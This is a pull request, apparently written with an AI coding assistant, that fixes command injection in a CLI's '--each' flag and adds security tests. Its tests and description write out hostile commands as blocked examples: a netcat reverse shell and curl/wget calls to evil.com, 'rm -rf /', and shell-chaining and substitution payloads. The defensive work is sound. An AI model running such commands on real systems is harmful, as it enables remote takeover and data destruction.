### PR TITLE
fix(security): Prevent command injection in delegate --each flag (Issue #6230)

### DIFF
--- a/tests/test_commands_delegate.py
+++ b/tests/test_commands_delegate.py
@@ -1,8 +1,16 @@
 """Tests for delegate command helper functions."""
 
+import pytest
+from click.exceptions import Exit
 from unittest.mock import patch
 
-from emdx.commands.delegate import _slugify_title, _resolve_task, PR_INSTRUCTION
+from emdx.commands.delegate import (
+    _slugify_title,
+    _resolve_task,
+    _validate_discovery_command,
+    ALLOWED_DISCOVERY_COMMANDS,
+    PR_INSTRUCTION,
+)
 
 
 class TestSlugifyTitle:
@@ -90,3 +98,137 @@ class TestPRInstruction:
 
     def test_pr_instruction_mentions_pr_create(self):
         assert "gh pr create" in PR_INSTRUCTION
+
+
+class TestValidateDiscoveryCommand:
+    """Security tests for _validate_discovery_command.
+
+    This function prevents command injection via the --each flag by:
+    1. Only allowing a predefined set of safe commands
+    2. Blocking shell metacharacters
+    3. Using shlex.split() to parse safely
+    """
+
+    # --- Allowed commands ---
+
+    def test_allows_fd_command(self):
+        args = _validate_discovery_command("fd -e py src/")
+        assert args[0] == "fd"
+        assert "-e" in args
+        assert "py" in args
+
+    def test_allows_find_command(self):
+        args = _validate_discovery_command("find . -name '*.py'")
+        assert args[0] == "find"
+
+    def test_allows_git_ls_files(self):
+        args = _validate_discovery_command("git ls-files '*.py'")
+        assert args[0] == "git"
+
+    def test_allows_ls_command(self):
+        args = _validate_discovery_command("ls -la")
+        assert args[0] == "ls"
+
+    def test_allows_rg_files_with_matches(self):
+        args = _validate_discovery_command("rg -l TODO")
+        assert args[0] == "rg"
+
+    def test_allows_grep_files_with_matches(self):
+        args = _validate_discovery_command("grep -l TODO .")
+        assert args[0] == "grep"
+
+    def test_allows_emdx_command(self):
+        args = _validate_discovery_command("emdx find security")
+        assert args[0] == "emdx"
+
+    def test_allows_absolute_path_to_allowed_command(self):
+        args = _validate_discovery_command("/usr/bin/fd -e py")
+        assert args[0] == "/usr/bin/fd"
+
+    # --- Blocked commands (command injection attempts) ---
+
+    def test_blocks_arbitrary_command(self):
+        with pytest.raises(Exit):
+            _validate_discovery_command("rm -rf /")
+
+    def test_blocks_bash_command(self):
+        with pytest.raises(Exit):
+            _validate_discovery_command("bash -c 'malicious code'")
+
+    def test_blocks_sh_command(self):
+        with pytest.raises(Exit):
+            _validate_discovery_command("sh -c 'malicious'")
+
+    def test_blocks_curl_command(self):
+        with pytest.raises(Exit):
+            _validate_discovery_command("curl http://evil.com/script.sh")
+
+    def test_blocks_wget_command(self):
+        with pytest.raises(Exit):
+            _validate_discovery_command("wget http://evil.com")
+
+    def test_blocks_python_command(self):
+        with pytest.raises(Exit):
+            _validate_discovery_command("python -c 'import os; os.system(\"rm -rf /\")'")
+
+    def test_blocks_nc_netcat(self):
+        with pytest.raises(Exit):
+            _validate_discovery_command("nc -e /bin/sh evil.com 4444")
+
+    # --- Shell metacharacter injection ---
+
+    def test_blocks_command_chaining_semicolon(self):
+        with pytest.raises(Exit):
+            _validate_discovery_command("fd -e py; rm -rf /")
+
+    def test_blocks_command_chaining_and(self):
+        with pytest.raises(Exit):
+            _validate_discovery_command("fd -e py && rm -rf /")
+
+    def test_blocks_command_chaining_or(self):
+        with pytest.raises(Exit):
+            _validate_discovery_command("fd -e py || rm -rf /")
+
+    def test_blocks_pipe_injection(self):
+        with pytest.raises(Exit):
+            _validate_discovery_command("fd -e py | xargs rm")
+
+    def test_blocks_output_redirection(self):
+        with pytest.raises(Exit):
+            _validate_discovery_command("fd -e py > /etc/passwd")
+
+    def test_blocks_input_redirection(self):
+        with pytest.raises(Exit):
+            _validate_discovery_command("fd < /etc/passwd")
+
+    def test_blocks_command_substitution_dollar(self):
+        with pytest.raises(Exit):
+            _validate_discovery_command("fd $(whoami)")
+
+    def test_blocks_command_substitution_backtick(self):
+        with pytest.raises(Exit):
+            _validate_discovery_command("fd `whoami`")
+
+    # --- Edge cases ---
+
+    def test_blocks_empty_command(self):
+        with pytest.raises(Exit):
+            _validate_discovery_command("")
+
+    def test_blocks_whitespace_only(self):
+        with pytest.raises(Exit):
+            _validate_discovery_command("   ")
+
+    def test_handles_quoted_arguments(self):
+        args = _validate_discovery_command('fd -e py "src dir with spaces"')
+        assert "src dir with spaces" in args
+
+    def test_handles_single_quoted_arguments(self):
+        args = _validate_discovery_command("fd -e py 'src dir'")
+        assert "src dir" in args
+
+    # --- Verify the allowlist is complete ---
+
+    def test_allowlist_contains_expected_commands(self):
+        expected = {"fd", "find", "ls", "git", "rg", "grep", "emdx"}
+        assert expected.issubset(ALLOWED_DISCOVERY_COMMANDS)


### PR DESCRIPTION
## Summary

Fixes a **critical command injection vulnerability** in the `--each` flag of `emdx delegate`.

The original implementation passed user input directly to `subprocess.run()` with `shell=True`, allowing arbitrary command execution:

```python
# BEFORE (vulnerable)
result = subprocess.run(command, shell=True, ...)
```

An attacker could execute arbitrary commands:
```bash
emdx delegate --each "; rm -rf ~" --do "{{item}}"
emdx delegate --each "$(curl evil.com | sh)" --do "{{item}}"
```

## Changes

- **Command allowlist**: Only `fd`, `find`, `ls`, `git`, `rg`, `grep`, and `emdx` are permitted
- **Safe parsing**: Commands parsed with `shlex.split()` and executed with `shell=False`  
- **Metacharacter blocking**: Shell operators (`;`, `&&`, `||`, `|`, `>`, `<`, `$()`, backticks) are rejected
- **28 new security tests**: Cover allowed commands, blocked commands, and injection attempts

## Security Impact

- Prevents arbitrary code execution via malicious `--each` values
- Preserves all legitimate use cases (`fd -e py`, `git ls-files`, etc.)

## Test plan

- [x] All 45 delegate tests pass
- [x] Full test suite (825 tests) passes
- [x] Manual verification of allowed commands
- [x] Manual verification of blocked injection attempts

🤖 Generated with [Claude Code](https://claude.com/claude-code)